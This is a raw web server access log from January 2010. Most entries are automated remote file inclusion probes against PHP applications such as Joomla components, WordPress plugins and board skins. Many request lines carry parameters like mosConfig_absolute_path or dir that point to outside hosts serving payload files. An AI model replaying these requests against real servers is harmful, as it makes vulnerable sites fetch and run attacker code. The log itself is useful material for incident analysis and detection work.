117.74.98.18 - - [17/Jan/2010:02:26:46 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://datanet.wonkwang.ac.kr//bbs//skin/zero_vote/x1.gif?? HTTP/1.1" 200 34523 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:26:50 -0500] "GET /logs/access_log.Q109102700%20%20//skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:26:50 -0500] "GET //skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:26:50 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:02:26:53 -0500] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
65.55.106.210 - - [17/Jan/2010:02:27:03 -0500] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
188.93.208.12 - - [17/Jan/2010:02:27:05 -0500] "GET /logs/access_log.Q109100400//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
188.93.208.12 - - [17/Jan/2010:02:27:05 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
188.93.208.12 - - [17/Jan/2010:02:27:06 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
110.45.136.177 - - [17/Jan/2010:02:27:09 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
110.45.136.177 - - [17/Jan/2010:02:27:09 -0500] "GET /logs/access_log.Q109100400//bbs//skin/ggambo7002_board/write.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
110.45.136.177 - - [17/Jan/2010:02:27:09 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:02:27:13 -0500] "GET /logs/access_log.Q109100400//bbs//skin/ggambo7002_board/write.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:02:27:13 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
188.93.208.12 - - [17/Jan/2010:02:27:15 -0500] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
110.45.136.177 - - [17/Jan/2010:02:27:19 -0500] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.17.199.105 - - [17/Jan/2010:02:27:22 -0500] "GET /logs/error_log.Q109100300%20%20/index2.php?x=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:02:27:24 -0500] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:02:27:24 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
188.93.208.12 - - [17/Jan/2010:02:27:26 -0500] "GET /logs/access_log.Q109100400//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
188.93.208.12 - - [17/Jan/2010:02:27:26 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
188.93.208.12 - - [17/Jan/2010:02:27:26 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.199.105 - - [17/Jan/2010:02:27:26 -0500] "GET /logs/error_log.Q109071900%20%20/index2.php?x=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
188.93.208.12 - - [17/Jan/2010:02:27:30 -0500] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:27:39 -0500] "GET /logs/access_log.Q109120300%20%20//skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
220.181.7.74 - - [17/Jan/2010:02:27:41 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
189.72.28.14 - - [17/Jan/2010:02:27:43 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:27:43 -0500] "GET /logs/access_log.Q109102700//skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:27:43 -0500] "GET //skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:02:27:55 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:02:27:55 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:02:27:55 -0500] "GET /logs/access_log.Q109100400//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:02:27:56 -0500] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:02:27:56 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:02:27:56 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:02:27:56 -0500] "GET /logs/access_log.Q109100400%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
65.55.106.210 - - [17/Jan/2010:02:27:55 -0500] "GET /logs/error_log.Q109050700 HTTP/1.1" 200 276616 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.16.230.82 - - [17/Jan/2010:02:28:00 -0500] "GET /logs/access_log.Q109072200%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:02:28:09 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:02:28:11 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:02:28:11 -0500] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:28:29 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:28:29 -0500] "GET /logs/access_log.Q109053100%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:28:29 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:28:29 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:28:29 -0500] "GET /logs/access_log.Q109053100%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:28:29 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:28:30 -0500] "GET /logs/access_log.Q109100700%20%20///maillist/install/install3.php?cabsolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:28:32 -0500] "GET /logs///maillist/install/install3.php?cabsolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:28:32 -0500] "GET ///maillist/install/install3.php?cabsolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:28:32 -0500] "GET /logs/access_log.Q109100500%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:28:33 -0500] "GET /logs/access_log.Q109100500%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:28:34 -0500] "GET /logs///maillist/install/install3.php?cabsolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:28:34 -0500] "GET ///maillist/install/install3.php?cabsolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:28:34 -0500] "GET ///maillist/install/install3.php?cabsolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:28:34 -0500] "GET /logs/access_log.Q109100700///maillist/install/install3.php?cabsolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:28:34 -0500] "GET /logs///maillist/install/install3.php?cabsolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:28:35 -0500] "GET /logs/access_log.Q109100700%20%20///maillist/install/install3.php?cabsolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:28:36 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:28:36 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:28:36 -0500] "GET /logs/error_log.Q109061200%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:28:36 -0500] "GET /logs/access_log.Q109061200%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:28:38 -0500] "GET /logs/error_log.Q109061200%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:28:38 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:28:38 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:28:38 -0500] "GET /logs/access_log.Q109061200%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:28:43 -0500] "GET ///maillist/install/install3.php?cabsolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:28:43 -0500] "GET /logs/access_log.Q109100700///maillist/install/install3.php?cabsolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:28:43 -0500] "GET /logs///maillist/install/install3.php?cabsolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.249.68.142 - - [17/Jan/2010:02:28:45 -0500] "GET /robots.txt HTTP/1.1" 404 208 "-" "Googlebot-Image/1.0"
66.249.68.142 - - [17/Jan/2010:02:28:45 -0500] "GET /images/over-index_tacking.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
38.99.120.74 - - [17/Jan/2010:02:28:51 -0500] "GET /logs/access_log.Q109120700//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
209.172.33.230 - - [17/Jan/2010:02:28:52 -0500] "GET /logs/access_log.Q109101500/index2.php?x=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:28:56 -0500] "GET /logs/error_log.Q109061200//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:28:56 -0500] "GET /logs/access_log.Q109061200//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:28:59 -0500] "GET /logs/error_log.Q109061200//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:28:59 -0500] "GET /logs/access_log.Q109061200//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:29:05 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:29:05 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:29:05 -0500] "GET /logs/access_log.Q109111700%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:29:06 -0500] "GET ///maillist/install/install3.php?cabsolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:29:07 -0500] "GET /logs/access_log.Q109100700///maillist/install/install3.php?cabsolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:29:07 -0500] "GET /logs///maillist/install/install3.php?cabsolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:29:08 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:29:08 -0500] "GET /logs/access_log.Q109053100%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:29:08 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:29:08 -0500] "GET /logs///maillist/install/install3.php?cabsolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:29:08 -0500] "GET /logs/access_log.Q109100700///maillist/install/install3.php?cabsolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:29:09 -0500] "GET ///maillist/install/install3.php?cabsolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:29:09 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:29:09 -0500] "GET /logs/access_log.Q109053100%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:29:09 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:29:12 -0500] "GET /logs/access_log.Q109100500%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:29:14 -0500] "GET /logs/access_log.Q109100500%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:29:27 -0500] "GET /logs/access_log.Q109053100//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:29:27 -0500] "GET /logs/access_log.Q109100500//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:29:28 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:29:28 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:29:28 -0500] "GET /logs/access_log.Q109090600%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:02:29:30 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:02:29:30 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:02:29:30 -0500] "GET /logs/access_log.Q109080700%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:29:31 -0500] "GET /logs/access_log.Q109053100//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:29:31 -0500] "GET /logs/access_log.Q109100500//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:02:29:32 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:02:29:32 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:02:29:33 -0500] "GET /logs/access_log.Q109080700%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:02:29:37 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:02:29:37 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:29:37 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:29:37 -0500] "GET /logs/access_log.Q109090600%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.223.143.131 - - [17/Jan/2010:02:29:37 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:02:29:38 -0500] "GET /logs/access_log.Q109080700%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:02:29:39 -0500] "GET /logs/access_log.Q109111700//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
189.72.28.14 - - [17/Jan/2010:02:29:56 -0500] "GET /logs/access_log.Q109120300//skin/zero_vote/error.php?dir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:02:30:02 -0500] "GET /logs/access_log.Q109080700//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:02:30:05 -0500] "GET /logs/access_log.Q109080700//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:30:06 -0500] "GET /logs/access_log.Q109053100//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:02:30:06 -0500] "GET /logs/access_log.Q109100500//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
